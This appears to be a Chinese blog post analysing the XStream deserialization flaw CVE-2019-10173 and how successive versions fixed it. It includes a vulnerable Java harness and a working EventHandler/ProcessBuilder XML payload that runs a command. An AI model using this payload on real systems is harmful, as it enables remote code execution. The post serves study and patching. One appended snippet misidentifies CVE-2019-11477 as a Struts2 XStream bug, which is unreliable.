XStream CVE-2019-10173漏洞分析

最新推荐文章于 2025-03-20 11:00:43 发布
原创 最新推荐文章于 2025-03-20 11:00:43 发布 · 4.9k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细分析了XStream库中的CVE-2013-7285漏洞修复及绕过的全过程,通过对比不同版本的XStream,展示了如何利用未初始化的安全框架重现此漏洞。

前言

首发NOSEC

该漏洞为CVE-2013-7285的补丁“绕过”。

这是一个很迷的洞,POC与CVE-2013-7285一毛一样,该Poc在XStream <=1.4.6和1.4.10上可用,也就是说开始修复的漏洞后来又出现了。

**吐句槽:**漏洞修复的版本在为1.4.11为2018年10月份发布,然后CVE编号是2019年的= =

在这里插入图片描述

官方关于漏洞这么写的(感谢Badcode师傅给的提醒,要不还在找绕过呢):

This maintenance release addresses again the security vulnerability CVE-2013-7285, an arbitrary execution of commands when unmarshalling for XStream instances with uninitialized security framework. Only 1.4.10 uninitialized security framework was affected.

emm,1.4.10未初始化安全框架时漏洞会生效。

从XStream的ChangeLog可以看出:

1.4.7加入了基于黑白名单的安全框架,但是未提供默认安全配置。

1.4.10加入了setupDefaultSecurity这个配置默认安全配置的方法,但是想生效,你得调用它┓( ´∀` )┏。

调试的代码

Java代码:

import com.thoughtworks.xstream.XStream;
import java.io.File;
public class main {
    public  static void main(String args[]){
        XStream xStream = new XStream();
        //XStream.setupDefaultSecurity(xStream);//1.4.10后可用,启用默认安全配置,此处先不使用
        xStream.fromXML(new File("1.xml"));
    }
}

1.xml文件(CVE-2013-7285的POC):

<sorted-set>
    <dynamic-proxy>
        <interface>java.lang.Comparable</interface>
        <handler class="java.beans.EventHandler">
            <target class="java.lang.ProcessBuilder">
                <command>
                    <string>calc</string>
                </command>
            </target>
            <action>start</action>
        </handler>
    </dynamic-proxy>
</sorted-set>

分析

在XStream的解析过程中,每个能被解析的Class都需要找到一个对应的Converter,这些Converter在XStream对象的构造时进行定义(下图为1.4.6版本的截图):

在这里插入图片描述

所有的Converter都实现了Converter接口:

在这里插入图片描述

在反序列化过程中,XStream回依次调用canConvert来寻找对应的Converter。

1.4.6中处理java.beans.EventHandler的是,ReflectionConverter:

在这里插入图片描述

1.4.7的Changelog中有这么一句:

java.bean.EventHandler no longer handled automatically because of severe security vulnerability.

java.bean.EventHandler由于安全问题,不会再被自动处理。

于是当版本切换到1.4.7时,Poc失效,会有如下提示:

在这里插入图片描述

java.beans.EventHandler没有指定的Converter,看下1.4.7版本的ReflectionConverter:

在这里插入图片描述

可以看出当处理的Class为java.beans.EventHandler时,ReflectionConverter不再进行认为可以处理。

1.4.10,我们可以发现,在不使用setupDefaultSecurity时,Poc又可以弹计算器了,ReflectionConverter中关于EventHandler的判断不见了:

在这里插入图片描述
此处看下setupDefaultSecurity的内容:

在这里插入图片描述

加了一堆白名单,当调用setupDefaultSecurity时,可以拦截本POC:

在这里插入图片描述

可惜默认不调用,┓( ´∀` )┏。

1.4.11之后,加入了一个新的Converter类InternalBlackList,与XStream类在同一文件中,不论是进行marshal还是unmarshal都会直接报错(序列化时调用marshal,反序列化时调用unmarshal):

在这里插入图片描述

在注册Converters时,InternalBlackList的优先级LOW高于ReflectionConverter的VERY_LOW,会优先判断。

在这里插入图片描述
所以可以看出,当时类名为java.beans.EventHandler时,会被分配给该Converter处理:

在这里插入图片描述
最终直接报了个异常(安全警报,拒绝反序列化):

在这里插入图片描述

结语

XStream这个洞很迷,估计大部分人升级库的时候都不会注意到要调用setupDefaultSecurity,毕竟对Maven这样的构建工具来讲,只要简单的改下版本号就可以升级了。

个人感觉是这么个过程:

开发做了个新的安全功能,感觉很牛逼,于是旧有的就给下了。

但是新的安全功能不默认开,导致老洞又出来了。。。

在这里插入图片描述

分析完了感觉:

在这里插入图片描述

【组件攻击链】XStream组件高危漏洞分析与利用
further_eye的博客
12-01 3428
XStream组件漏洞主要是java反序列化造成的远程代码执行漏洞,目前官方通过黑名单的方式对java反序列化攻击进行防御,由于黑名单防御机制存在被绕过的风险,因此以后可能会出现类似java反序列化漏洞
XStream反序列化
Finlinlts的博客
10-01 1854
概述 XStream是Java类库,用来将对象序列化成XML(JSON)或反序列化为对象。XStream在运行时使用Java反射机制对要进行序列化的对象树的结构进行探索,并不需要对对象作出修改。XStream可以序列化内部字段,包括私private和final字段,并且支持非公开类以及内部类。在缺省情况下,XStream不需要配置映射关系,对象和字段将映射为同名XML元素。但是当对象和字段名与XML中的元素名不同时,XStream支持指定别名。XStream支持以方法调用的方式,或是Java标注的方式指定
CVE-2019-10173&&CVE-2013-7285
GalaxySpaceX的博客
03-20 1068
CVE-2019-10173&&CVE-2013-7285
NO.93 WebLogic1213升级常见问题总结
AmosRyan--整体的局部还是整体,宇宙之外还是宇宙
02-02 5732
不断更新中 *LogBack.xml不能正常读取 *java.io.IOException: Connection closed, EOF detected 问题 *JS文件中alert、congfirm或innerHTML等需要显示在页面的中文乱码 *xstream转换报文报错 *应用在win环境的WLS12C下无问题,但在Linux的WLS12C下部署时报NullPointerException *ILOG6.5需配套升级至8.5
精选资源
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
05-05
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
精选资源
XStream1.4.16反序列化漏洞CVE-2020-26258、CVE-2020-26259)
05-08
近日XStream官方发布安全更新,修复了XStream 反序列化漏洞CVE-2020-26258、CVE-2020-26259)。攻击者通过构造恶意的XML文档,可绕过XStream的黑名单,触发反序列化,从而造成CVE-2020-26258 SSRF漏洞,以及 CVE-...
Xstream漏洞复现(CVE-2021-29505)
Ashely的博客
09-24 3828
Vulhub漏洞环境搭建 拉取漏洞镜像 复现漏洞 一、Vulhub漏洞环境搭建 详见文章Vulhub靶场搭建(Centos7) 二、拉取漏洞镜像 1.进入到vulhub/Xstream/CVE-2021-29505目录下,执行 docker-compose up -d 等待拉取镜像。(默认拉取镜像速度很慢,建议换源,可参考https://blog.youkuaiyun.com/weixin_30565327/article/details/101108079) 2. ...
CVE-2021-29505 XStream远程代码执行漏洞复现
m0_56642842的博客
07-29 2243
0x00 简介 XStream是一个常用的Java对象和XML相互转换的工具,是用来处理XML文件序列化的框架,在将javaBean序列化,或将XML文件反序列化的时候,不需要其它辅助类和映射文件,大大简化了XML序列化工作。 0x01 漏洞概述 XStream官方发布安全更新,修复了多个XStream 反序列化漏洞,其中就包含了CVE-2021-29505。攻击者通过构造恶意的XML文档,可绕过XStream的黑名单,触发反序列化,从而造成CVE-2021-29505反序列化代码执行漏洞等。漏洞复杂度低,
漏洞总结-linux提权漏洞
smart的博客
09-02 7286
漏洞总结-linux提权漏洞CVE-2019-13272CVE-2016-5195 CVE-2019-13272 此漏洞只能在使用了pkexec验证程序的系统中可以提权成功。 受影响的系统 Ubuntu 16.04.5 kernel 4.15.0-29-generic Ubuntu 18.04.1 kernel 4.15.0-20-generic Ubuntu 19.04 kernel 5.0.0-15-generic Ubuntu Mate 18.04.2 kernel 4.1
Webmin未经身份验证的远程代码执行 CVE-2019-15107 漏洞复现
ADummy的博客
03-02 365
Webmin未经身份验证的远程代码执行(CVE-2019-15107) by ADummy 0x00利用路线 ​ burpuite抓包—>改包—>远程代码执行 0x01漏洞介绍 ​ 参考链接的有效负载不完整。深入阅读代码后,我发现只有在1.920之前不存在主体的用户参数时,才能执行命令,而在1.920处没有限制。 ​ 影响版本 Webmin < 1.920 0x02漏洞复现 ​ 参考链接的有效负载不完整。深入阅读代码后,我发现只有在1.920之前不存在主体的用户参数时,才能
XStream反序列化漏洞分析
weixin_44825990的博客
12-13 1061
XStream反序列化流程及CVE-2020-26217漏洞分析
再谈cve-2019-0708漏洞最新事情,更新poc及个人说明
Summer's blog
05-13 7787
距离CVE-2019-0708漏洞出现的了有一段时间了,在此期间poc都更新了几个版本。有人也来问过我具体这个漏洞怎么利用、实现。我在篇文章里面会有统一的回答一下我的见解,希望的大佬们不要喷,以下纯属与个人看法。理解不对希望可以指出。 第一,我觉得这个是新爆出的巨大的微软系统漏洞,exp一下是不可能出现的,最近国家在网络上也有些行动的。我建议大家不要这么心急,去想着怎么利用这个漏洞。目前我...
XStream 反序列化漏洞 (CVE-2020-26258 & 26259) 的复现与分析
smellycat000的专栏
12-16 3998
聚焦源代码安全,网罗国内外最新资讯!Xstream 是 Java 类库,用来将对象序列化成 XML (JSON) 或反序列化为对象。XStream 是一款开源软件,允许在 BSD 许可...
各种反序列化(XStream/XMLDecoder)
公众号shadow sock7
03-16 3525
XStream反序列化原理 XStream将对象和xml字符串之间进行转换。 Object <=> XML字符串 XStream#toXML(Object o) // 对象=> xml XStream#fromXML(FileInputStream xml) // xml => 对象 XStream反序列化漏洞 影响范围 1.4.x<=1.4.6或1....
xstream xml转对象_【漏洞通告】XStream < 1.4.14 远程代码执行高危漏洞CVE202026217)...
weixin_39764379的博客
12-12 700
文章转载自阿里云先知 概述2020年11月16日,国内有关安全团队监测到XStream官方发布安全更新,修复了 CVE-2020-26217 XStream远程代码执行漏洞漏洞描述XStream是一个常用的Java对象和XML相互转换的工具。近日XStream官方发布安全更新,修复了 CVE-2020-26217 XStream远程代码执行漏洞。攻击者通过构造恶意的XML文...
开源组件XStream 修复11个漏洞并公开 PoC
smellycat000的专栏
03-16 1179
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队XStream 发布新版本 1.4.16,修复了11个漏洞CVE-2021-21341、CVE-2021-21342、CVE...
CVE-2019-11477 漏洞检测脚本(影响大多数Linux内核)
大哥一声吼
06-20 6045
漏洞公布时间:2019-06-17 漏洞影响范围:CVE-2019-11477: SACK Panic (Linux >= 2.6.29) 漏洞概述: A sequence of SACKs may be crafted such that one can trigger an integer overflow, leading to a kernel panic. 漏洞详情: 首先...
CVE-2019-11477是什么
最新发布
06-17
CVE-2019-11477 是一个存在于 Apache Struts2 框架中的远程代码执行漏洞,通常被称为 "Struts2 REST 插件 XStream 反序列化漏洞"。该漏洞允许攻击者通过构造恶意的 XML 数据包来触发反序列化操作,从而实现远程代码...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值